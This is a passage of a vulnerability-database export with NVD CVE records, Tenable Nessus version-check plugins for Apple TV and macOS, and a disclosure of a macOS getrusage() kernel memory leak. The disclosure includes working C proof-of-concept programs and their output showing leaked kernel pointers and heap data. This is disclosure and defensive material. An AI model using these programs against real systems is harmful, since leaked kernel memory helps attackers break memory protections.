"NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:52:28", "description": "An issue was discovered in the HDF HDF5 1.8.20 library. There is a memcpy parameter overlap in the function H5O_link_decode in H5Olink.c.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-10T21:29:00", "title": "CVE-2018-13869", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13869"], "modified": "2018-08-31T17:10:00", "cpe": ["cpe:/a:hdfgroup:hdf5:1.8.20"], "id": "CVE-2018-13869", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-13869", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:hdfgroup:hdf5:1.8.20:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:36", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.", "edition": 9, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-12-25T21:29:00", "title": "CVE-2017-13869", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13869"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-13869", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13869", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "nessus": [{"lastseen": "2021-03-01T01:24:23", "description": "According to its banner, the version of Apple TV on the remote device\nis prior to 11.2. It is, therefore, affected by multiple\nvulnerabilities as described in the HT208327 security advisory.\n\nNote that only 4th and 5th generation models are affected by these\nvulnerabilities.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-01-05T00:00:00", "title": "Apple TV < 11.2 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13869", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13865", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-13870", "CVE-2017-13868", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13833", "CVE-2017-13867", "CVE-2017-13861", "CVE-2017-7154", "CVE-2017-7157", "CVE-2017-13862"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_11_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105612", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105612);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/06/04 9:45:00\");\n\n script_cve_id(\n \"CVE-2017-7154\",\n \"CVE-2017-7156\",\n \"CVE-2017-7157\",\n \"CVE-2017-7160\",\n \"CVE-2017-7162\",\n \"CVE-2017-13833\",\n \"CVE-2017-13855\",\n \"CVE-2017-13856\",\n \"CVE-2017-13861\",\n \"CVE-2017-13862\",\n \"CVE-2017-13865\",\n \"CVE-2017-13866\",\n \"CVE-2017-13867\",\n \"CVE-2017-13868\",\n \"CVE-2017-13869\",\n \"CVE-2017-13870\",\n \"CVE-2017-13876\"\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-12-6-4\");\n\n script_name(english:\"Apple TV < 11.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 11.2. It is, therefore, affected by multiple\nvulnerabilities as described in the HT208327 security advisory.\n\nNote that only 4th and 5th generation models are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208327\");\n # https://seclists.org/fulldisclosure/2017/Dec/29\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?262ee1b8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 11.2 or later. Note that this update is\nonly available for 4th and 5th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7162\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Webkit Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\n# https://en.wikipedia.org/wiki/TvOS\n# 4th gen model \"5,3\" and 5th gen model \"6,2\" share same build\nfixed_build = \"15K106\";\ntvos_ver = '11';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : make_list(4, 5),\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_WARNING\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:43:24", "description": "The remote host is running Mac OS X 10.11.6 or Mac OS X 10.12.6 and is\nmissing a security update. It is therefore, affected by multiple\nvulnerabilities affecting the following components :\n\n - apache\n - curl\n - IOAcceleratorFamily\n - IOKit\n - Kernel\n - OpenSSL\n - Screen Sharing Server", "edition": 30, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-12-07T00:00:00", "title": "macOS and Mac OS X Multiple Vulnerabilities (Security Update 2017-002 and 2017-005)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12837", "CVE-2017-9798", "CVE-2017-13869", "CVE-2017-7158", "CVE-2017-3735", "CVE-2017-7172", "CVE-2017-13904", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-1000254", "CVE-2017-7159", "CVE-2017-15422", "CVE-2017-13868", "CVE-2017-13847", "CVE-2017-13867", "CVE-2017-7173", "CVE-2017-13872", "CVE-2017-7154", "CVE-2017-13862"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:apple:macos", "cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2017-005.NASL", "href": "https://www.tenable.com/plugins/nessus/105081", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105081);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-3735\",\n \"CVE-2017-7154\",\n \"CVE-2017-7158\",\n \"CVE-2017-7159\",\n \"CVE-2017-7162\",\n \"CVE-2017-7172\",\n \"CVE-2017-7173\",\n \"CVE-2017-9798\",\n \"CVE-2017-12837\",\n \"CVE-2017-13847\",\n \"CVE-2017-13855\",\n \"CVE-2017-13862\",\n \"CVE-2017-13867\",\n \"CVE-2017-13868\",\n \"CVE-2017-13869\",\n \"CVE-2017-13872\",\n \"CVE-2017-13904\",\n \"CVE-2017-15422\",\n \"CVE-2017-1000254\"\n );\n script_bugtraq_id(\n 100515,\n 100860,\n 100872,\n 101115,\n 101981,\n 102097,\n 102098,\n 102100,\n 103134,\n 103135\n );\n\n script_name(english:\"macOS and Mac OS X Multiple Vulnerabilities (Security Update 2017-002 and 2017-005)\");\n script_summary(english:\"Checks for the presence of Security Update 2017-002 / 2017-005.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS or Mac OS X security update that\nfixes multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Mac OS X 10.11.6 or Mac OS X 10.12.6 and is\nmissing a security update. It is therefore, affected by multiple\nvulnerabilities affecting the following components :\n\n - apache\n - curl\n - IOAcceleratorFamily\n - IOKit\n - Kernel\n - OpenSSL\n - Screen Sharing Server\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208331\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2017-005 or later for 10.11.x or\nSecurity Update 2017-002 or later for 10.12.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7172\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:\"-\");\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\nos = get_kb_item_or_exit(\"Host/MacOSX/Version\");\n\nif (!preg(pattern:\"Mac OS X 10\\.(11\\.6|12\\.6)([^0-9]|$)\", string:os))\n audit(AUDIT_OS_NOT, \"Mac OS X 10.11.6 or Mac OS X 10.12.6\");\n\nif (\"10.11.6\" >< os)\n patch = \"2017-005\";\nelse\n patch = \"2017-002\";\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = pgrep(\n pattern:\"^com\\.apple\\.pkg\\.update\\.(security\\.|os\\.SecUpd).*bom$\",\n string:packages\n);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = pregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:37:07", "description": "The remote host is running a version of Mac OS X that is 10.13.x\nprior to 10.13.2. It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - apache\n - curl\n - Directory Utility\n - IOAcceleratorFamily\n - IOKit\n - Intel Graphics Driver\n - Kernel\n - Mail\n - Mail Drafts\n - OpenSSL\n - Screen Sharing Server\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.", "edition": 33, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-12-07T00:00:00", "title": "macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798", "CVE-2017-13869", "CVE-2017-5754", "CVE-2017-13887", "CVE-2017-7155", "CVE-2017-13871", "CVE-2017-7151", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-7158", "CVE-2017-13892", "CVE-2017-3735", "CVE-2017-7172", "CVE-2017-13858", "CVE-2017-13886", "CVE-2017-13904", "CVE-2017-13878", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-1000254", "CVE-2017-7159", "CVE-2017-13911", "CVE-2017-15422", "CVE-2017-13868", "CVE-2017-13847", "CVE-2017-13867", "CVE-2017-7163", "CVE-2017-7173", "CVE-2017-13872", "CVE-2017-13883", "CVE-2017-7154", "CVE-2017-13905", "CVE-2017-13848", "CVE-2017-13862", "CVE-2017-13875"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:apple:macos", "cpe:/o:apple:mac_os_x"], "id": "MACOS_10_13_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105080", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105080);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/06/19 15:17:43\");\n\n script_cve_id(\n \"CVE-2017-1000254\",\n \"CVE-2017-13847\",\n \"CVE-2017-13848\",\n \"CVE-2017-13855\",\n \"CVE-2017-13858\",\n \"CVE-2017-13860\",\n \"CVE-2017-13862\",\n \"CVE-2017-13865\",\n \"CVE-2017-13867\",\n \"CVE-2017-13868\",\n \"CVE-2017-13869\",\n \"CVE-2017-13871\",\n \"CVE-2017-13872\",\n \"CVE-2017-13875\",\n \"CVE-2017-13876\",\n \"CVE-2017-13878\",\n \"CVE-2017-13883\",\n \"CVE-2017-13886\",\n \"CVE-2017-13887\",\n \"CVE-2017-13892\",\n \"CVE-2017-13904\",\n \"CVE-2017-13905\",\n \"CVE-2017-13911\",\n \"CVE-2017-15422\",\n \"CVE-2017-3735\",\n \"CVE-2017-5754\",\n \"CVE-2017-7151\",\n \"CVE-2017-7154\",\n \"CVE-2017-7155\",\n \"CVE-2017-7158\",\n \"CVE-2017-7159\",\n \"CVE-2017-7162\",\n \"CVE-2017-7163\",\n \"CVE-2017-7171\",\n \"CVE-2017-7172\",\n \"CVE-2017-7173\",\n \"CVE-2017-9798\"\n );\n script_bugtraq_id(\n 100515,\n 100872,\n 101115,\n 101981,\n 102097,\n 102098,\n 102099,\n 102100,\n 102378,\n 103134,\n 103135\n );\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)\");\n script_summary(english:\"Checks the version of Mac OS X / macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X that is 10.13.x\nprior to 10.13.2. It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - apache\n - curl\n - Directory Utility\n - IOAcceleratorFamily\n - IOKit\n - Intel Graphics Driver\n - Kernel\n - Mail\n - Mail Drafts\n - OpenSSL\n - Screen Sharing Server\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208331\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208394\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.13.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7172\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = pregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (empty_or_null(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\nfixed_version = \"10.13.2\";\n\nif (version !~\"^10\\.13($|[^0-9])\")\n audit(AUDIT_OS_NOT, \"macOS 10.13.x\");\n\nif (ver_compare(ver:version, fix:'10.13.2', strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-12-25T18:33:48", "description": "For 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace:\r\n```\r\nint\r\ngetrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval)\r\n{\r\n struct rusage *rup, rubuf;\r\n struct user64_rusage rubuf64;\r\n struct user32_rusage rubuf32;\r\n size_t retsize = sizeof(rubuf); /* default: 32 bits */\r\n caddr_t retbuf = (caddr_t)&rubuf; /* default: 32 bits */\r\n struct timeval utime;\r\n struct timeval stime;\r\n\r\n\r\n switch (uap->who) {\r\n case RUSAGE_SELF:\r\n calcru(p, &utime, &stime, NULL);\r\n proc_lock(p);\r\n rup = &p->p_stats->p_ru;\r\n rup->ru_utime = utime;\r\n rup->ru_stime = stime;\r\n\r\n rubuf = *rup;\r\n proc_unlock(p);\r\n\r\n break;\r\n [...]\r\n }\r\n if (IS_64BIT_PROCESS(p)) {\r\n retsize = sizeof(rubuf64);\r\n retbuf = (caddr_t)&rubuf64;\r\n munge_user64_rusage(&rubuf, &rubuf64);\r\n } else {\r\n [...]\r\n }\r\n\r\n return (copyout(retbuf, uap->rusage, retsize));\r\n}\r\n```\r\n`munge_user64_rusage()` performs the conversion by copying individual fields:\r\n```\r\n__private_extern__ void \r\nmunge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p)\r\n{\r\n /* timeval changes size, so utime and stime need special handling */\r\n a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec;\r\n a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec;\r\n a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec;\r\n a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec;\r\n[...]\r\n}\r\n```\r\n`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element:\r\n```\r\n#define _STRUCT_USER64_TIMEVAL struct user64_timeval\r\n_STRUCT_USER64_TIMEVAL\r\n{\r\n user64_time_t tv_sec; /* seconds */\r\n __int32_t tv_usec; /* and microseconds */\r\n};\r\n\r\nstruct user64_rusage {\r\n struct user64_timeval ru_utime; /* user time used */\r\n struct user64_timeval ru_stime; /* system time used */\r\n user64_long_t ru_maxrss; /* max resident set size */\r\n[...]\r\n};\r\n```\r\nThis padding is not initialized, but is copied to userspace.\r\n\r\n\r\nThe following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0.\r\n\r\n\r\nJust leaking stack data from a previous syscall seems to mostly return the upper halfes of some kernel pointers.\r\nThe returned data seems to come from the previous syscall:\r\n```\r\n$ cat test.c\r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4);\r\n memcpy(&leak1, ((char*)&ru)+28, 4);\r\n printf(\"leak1: 0x%08x\\n\", leak1);\r\n printf(\"leak2: 0x%08x\\n\", leak2);\r\n}\r\n\r\nint main(void) {\r\n do_leak();\r\n do_leak();\r\n do_leak();\r\n int fd = open(\"/dev/null\", O_RDONLY);\r\n do_leak();\r\n int dummy;\r\n read(fd, &dummy, 4);\r\n do_leak();\r\n return 0;\r\n}\r\n```\r\n\r\n```\r\n$ gcc -o test test.c && ./test\r\nleak1: 0x00000000\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff81\r\nleak2: 0x00000000\r\n```\r\n\r\nHowever, I believe that this can also be used to disclose kernel heap memory.\r\nWhen the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack\r\nwithout zeroing it, so the new stack contains data from previous heap allocations.\r\nThe following testcase, when run after repeatedly reading a wordlist into memory,\r\nleaks some non-pointer data that seems to come from the wordlist:\r\n```\r\n$ cat forktest.c \r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4);\r\n memcpy(&leak1, ((char*)&ru)+28, 4);\r\n char str[1000];\r\n if (leak1 != 0) {\r\n sprintf(str, \"leak1: 0x%08x\\n\", leak1);\r\n write(1, str, strlen(str));\r\n }\r\n if (leak2 != 0) {\r\n sprintf(str, \"leak2: 0x%08x\\n\", leak2);\r\n write(1, str, strlen(str));\r\n }\r\n}\r\n\r\nvoid leak_in_child(void) {\r\n int res_pid, res2;\r\n asm volatile(\r\n \"mov $0x02000002, %%rax\\n\\t\"\r\n \"syscall\\n\\t\"\r\n : \"=a\"(res_pid), \"=d\"(res2)\r\n :\r\n : \"cc\", \"memory\", \"rcx\", \"r11\"\r\n );\r\n //write(1, \"postfork\\n\", 9);\r\n if (res2 == 1) {\r\n //write(1, \"child\\n\", 6);\r\n do_leak();\r\n char dummy;\r\n read(0, &dummy, 1);\r\n asm volatile(\r\n \"mov $0x02000001, %rax\\n\\t\"\r\n \"mov $0, %rdi\\n\\t\"\r\n \"syscall\\n\\t\"\r\n );\r\n }\r\n //printf(\"fork=%d:%d\\n\", res_pid, res2);\r\n int wait_res;\r\n //wait(&wait_res);\r\n}\r\n\r\nint main(void) {\r\n for(int i=0; i<1000; i++) {\r\n leak_in_child();\r\n }\r\n}\r\n```\r\n\r\n```\r\n$ gcc -o forktest forktest.c && ./forktest\r\nleak1: 0x1b3b1320\r\nleak1: 0x00007f00\r\nleak1: 0x65686375\r\nleak1: 0x410a2d63\r\nleak1: 0x8162ced5\r\nleak1: 0x65736168\r\nleak1: 0x0000042b\r\n```\r\nThe leaked values include the strings \"uche\", \"c-\\nA\" and \"hase\", which could plausibly come from the wordlist.\r\n\r\n\r\nApart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs 